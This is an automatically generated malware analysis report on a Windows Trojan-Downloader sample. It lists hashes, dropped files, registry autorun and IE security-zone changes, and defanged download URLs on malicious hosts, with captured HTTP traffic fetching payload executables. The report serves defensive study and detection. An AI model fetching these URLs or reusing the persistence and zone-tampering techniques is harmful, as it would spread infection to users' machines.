Gen.Variant.Kazy.498177_586aabede0

by malwarelabrobot on January 12th, 2015 in Malware Descriptions.

Trojan-Downloader.MSIL.Agent.hfq (Kaspersky), Gen:Variant.Kazy.498177 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 586aabede0d6c100a7882cb298abc906
SHA1: 65a4ddd54f2dca0c6d09ef0d8729b0f365f891bf
SHA256: 61223d57304d94baaab15607eb47ccc8fa664d56bd74571d1b1b972ffde0e399
SSDeep: 24576:nAT8QE kqlg8F1hnepRdOAFWq8GTi9B8I4sKcXkIAc:nAI Px1Z /1TjI4sKEkIAc
Size: 1177056 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1872
instal.exe:1992
launcher.exe:1532
WPFFontCache_v0400.exe:1988

The Trojan injects its code into the following process(es):

launcher.exe:844

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (2917 bytes)
%Documents and Settings%\%current user%\Application Data\svchost.exe (12 bytes)
%Documents and Settings%\%current user%\Application Data\pandahack.exe (18251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)

The process instal.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\Adobe AIR\Versions\1.0\Adobe AIR.dll (324576 bytes)
%System%\META-INF\AIR\application.xml (1 bytes)
%System%\svchostUpdate.exe (1067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\Company\Test\Uninstall.exe (3195 bytes)
%System%\META-INF\AIR\hash (32 bytes)
%System%\launcher.swf (3 bytes)
%System%\META-INF\signatures.xml (818 bytes)
%System%\launcher.exe (329 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\adobecp.dll (90336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (34242 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll (162417 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe (1568 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll (60436 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (20637 bytes)
%System%\mimetype (59 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\adobecp.vch (11242 bytes)
%Program Files%\Company\Test\Uninstall.ini (3 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\WebKit.dll (77249 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)

The process launcher.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\svchost\Adobe AIR\Versions\1.0\Adobe AIR.dll (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Adobe AIR[1] (2917624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\main[1].swf (60712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\mimetype[1] (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Adobe AIR[1].vch (217004 bytes)
%System%\svchost\mimetype (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\svchost[1] (5716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\AdobeCP[1] (1051142 bytes)
%System%\svchost\svchost.exe (59 bytes)
%System%\svchost\main.swf (1673 bytes)
%System%\svchost\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The process launcher.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\signatures[1].xml (825 bytes)
%System%\META-INF\AIR\application.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\application[1].xml (1400 bytes)
%System%\launcher.swf (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].xml (818 bytes)
%System%\META-INF\signatures.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\hash[1] (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\launcher[1].swf (796 bytes)
%System%\META-INF\AIR\hash (32 bytes)

Registry activity

The process %original file name%.exe:1872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallDate" = "20150111"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"URLInfoAbout" = "http://www.company.com/"
"InstallSource" = "c:\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayName" = "Test 1.00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayIcon" = "\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallLocation" = "\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"HelpLink" = "mailto:[email protected]"
"UninstallString" = "\Uninstall.exe"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayVersion" = "1.00"

"Publisher" = "Company"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"svchost.exe" = "Программа установки"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 AA FD 72 11 C0 68 61 3E 0C 32 A6 46 7B D9 2A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"VersionMinor" = "0"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"EstimatedSize" = "1037"
"VersionMajor" = "1"
"Language" = "1049"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Flash Updater" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"

The process instal.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallDate" = "20150111"
"URLInfoAbout" = "http://www.company.com/"
"InstallSource" = "%Program Files%\svhost\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayName" = "Test 1.00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayIcon" = "%Program Files%\Company\Test\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallLocation" = "%Program Files%\Company\Test\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"HelpLink" = "mailto:[email protected]"
"UninstallString" = "%Program Files%\Company\Test\Uninstall.exe"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayVersion" = "1.00"

"Publisher" = "Company"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 AF 50 62 91 D4 00 D9 18 65 34 B8 C5 3B E9 61"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"VersionMinor" = "0"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"Launcher.exe" = "launcher"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"EstimatedSize" = "38108"
"VersionMajor" = "1"
"Language" = "1049"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"test" = "%WinDir%\System32\launcher.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process launcher.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 12 D7 07 32 15 2B E6 CB 02 9C BD E0 A8 6A F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process launcher.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 92 37 1C 29 03 7F 22 4C CC E2 C3 25 05 08 F2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process WPFFontCache_v0400.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 84 94 23 52 47 EF C3 E9 99 4E 37 27 AB 27 8A"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

Dropped PE files

MD5 File path
d1529a522773fc6ab2192d80f7b0ec2e c:\Documents and Settings\"%CurrentUserName%"\Application Data\pandahack.exe
53abeb6693f4ee48c5c599fc3e6b349c c:\Documents and Settings\"%CurrentUserName%"\Application Data\svchost.exe
bb4dd20cb94e3a77c594f50031a8aab0 c:\Program Files\svhost\instal.exe
be9952f061099b0421145f32d5f79c8a c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Adobe AIR.dll
3cc6f3bcbf2fb4472ae1122159dc949f c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll
2e14ffbe1c3c1e742ac28dc7cb7bf2e2 c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe
e488467e5c14432f0b71ccec7f5946a7 c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll
952b934e64bbbd8df0d528ad70a75f3f c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\WebKit.dll
074cf18a75896826af203bb790b51625 c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\adobecp.dll
25aca18c491a20211c304051570c4387 c:\WINDOWS\system32\svchostUpdate.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Company
Product Name:
Product Version:
Legal Copyright: Company
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.00
File Description: Test 1.00 Installation
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 148684 148992 4.57091 5e14e4ede2e2215bc7d72837b9871f8f
DATA 155648 10388 10752 2.62963 abafcbfbd7f8ac0226ca496a92a0cf06
BSS 167936 4341 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 176128 6040 6144 3.3864 a4e0ac39d5ed487ceea059fa23dfce5e
.tls 184320 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 188416 24 512 0.14174 c4fdd0c5c9efb616fcc85d66056ca490
.reloc 192512 6276 6656 4.56552 867a1120317d51734587a74f6ee70016
.rsrc 200704 191384 191488 1.16869 deda197d0e6ed6ff6f5abe94aba5d863

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://xz-wow.ru/niga.exe 188.165.232.118
hxxp://xz-wow.ru/update.xml?1420990600032 188.165.232.118
hxxp://xz-wow.ru/Update/launcher/launcher.swf?1420990601267 188.165.232.118
hxxp://xz-wow.ru/Update/launcher/META-INF/signatures.xml?1420990601454 188.165.232.118
hxxp://xz-wow.ru/Update/launcher/META-INF/AIR/application.xml?1420990601610 188.165.232.118
hxxp://xz-wow.ru/Update/launcher/META-INF/AIR/hash?1420990601735 188.165.232.118
hxxp://xz-wow.ru/update.xml?1420990602751 188.165.232.118
hxxp://xz-wow.ru/Update/main.swf?1420990603282 188.165.232.118
hxxp://xz-wow.ru/Update/mimetype?1420990604517 188.165.232.118
hxxp://xz-wow.ru/Update/svchost.exe?1420990604642 188.165.232.118
hxxp://xz-wow.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 188.165.232.118
hxxp://www.shmonka.ru/Update/launcher/META-INF/AIR/hash?1420990601735 188.165.232.118
hxxp://www.shmonka.ru/Update/svchost.exe?1420990604642 188.165.232.118
hxxp://www.shmonka.ru/update.xml?1420990600032 188.165.232.118
hxxp://www.shmonka.ru/Update/main.swf?1420990603282 188.165.232.118
hxxp://www.shmonka.ru/Update/launcher/META-INF/AIR/application.xml?1420990601610 188.165.232.118
hxxp://www.shmonka.ru/Update/launcher/launcher.swf?1420990601267 188.165.232.118
hxxp://www.shmonka.ru/Update/mimetype?1420990604517 188.165.232.118
hxxp://www.shmonka.ru/Update/launcher/META-INF/signatures.xml?1420990601454 188.165.232.118
hxxp://www.shmonka.ru/update.xml?1420990602751 188.165.232.118
hxxp://www.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 188.165.232.118


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /niga.exe HTTP/1.1
Host: xz-wow.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:35:36 GMT
Content-Type: application/octet-stream
Content-Length: 15175309
Last-Modified: Mon, 29 Dec 2014 07:47:36 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....F..........hT.......`....@..........................@......,.....
.......@......................................@ ......................
......................................................................
..............CODE.....D.......F.................. ..`DATA.....(...`..
.*...J..............@...BSS..................t...................idata
[email protected]................................
[email protected]....................
[email protected]...@ ......."[email protected]............. ..
[email protected]..............................................
......................................................................
[email protected]............@...
[email protected][email protected][email protected][email protected][email protected].@.@.@.
[email protected]@[email protected].% .B....%..B....%..B....%..B....%..B....%..B....%
,.B....%..B....%..B....%..B....%..B....%..B....%<.B....%8.B....%4.B
....%..B....%H.B....%D.B....%..B....%..B...S........T......D$,.t...\$0
....D[....%..B....%..B....%..B....%..B....%..B....%..B....%..B....%..B
...S......B..;.uYhD...j.......D$..|$..u.3...$.P.D$.....B....D$....B.3.
[email protected]$..D$......D$...$..$...[..
<<< skipped >>>


GET /update.xml?1420990602751 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:34 GMT
Content-Type: text/xml
Content-Length: 3993
Last-Modified: Sat, 03 Jan 2015 14:00:06 GMT
Connection: keep-alive
Accept-Ranges: bytes
<xml>..<file>...<fileName>svchostUpdate.exe</file
Name>...<fileDir>../</fileDir>...<fileDirWebServer&g
t;hXXp://VVV.shmonka.ru/Update/launcher/svchostUpdate.exe</fileDirW
ebServer>...<filesize>59392</filesize>..</file>..
<file>...<fileName>main.swf</fileName>...<fileDir
></fileDir>...<fileDirWebServer>hXXp://VVV.shmonka.ru/U
pdate/main.swf</fileDirWebServer>...<filesize>392738</f
ilesize>..</file>..<file>...<fileName>mimetype<
;/fileName>...<fileDir></fileDir>...<fileDirWebServe
r>hXXp://VVV.shmonka.ru/Update/mimetype</fileDirWebServer>...
<filesize>59</filesize>..</file>..<file>...<
;fileName>svchost.exe</fileName>...<fileDir></fileDi
r>...<fileDirWebServer>hXXp://VVV.shmonka.ru/Update/svchost.e
xe</fileDirWebServer>...<filesize>59392</filesize>..
</file>..<file>...<fileName>Adobe AIR.dll</fileNa
me>...<fileDir>Adobe AIR/Versions/1.0/</fileDir>...<
fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.
0/Adobe AIR.dll</fileDirWebServer>...<filesize>14317952<
;/filesize>..</file>..<file>...<fileName>Adobe AI
R.vch</fileName>...<fileDir>Adobe AIR/Versions/1.0/Resourc
es/</fileDir>...<fileDirWebServer>hXXp://VVV.shmonka.ru/Up
date/Adobe AIR/Versions/1.0/Resources/Adobe AIR.vch</fileDirWeb
<<< skipped >>>

GET /Update/main.swf?1420990603282 HTTP/1.1


Referer: app:/launcher.swf
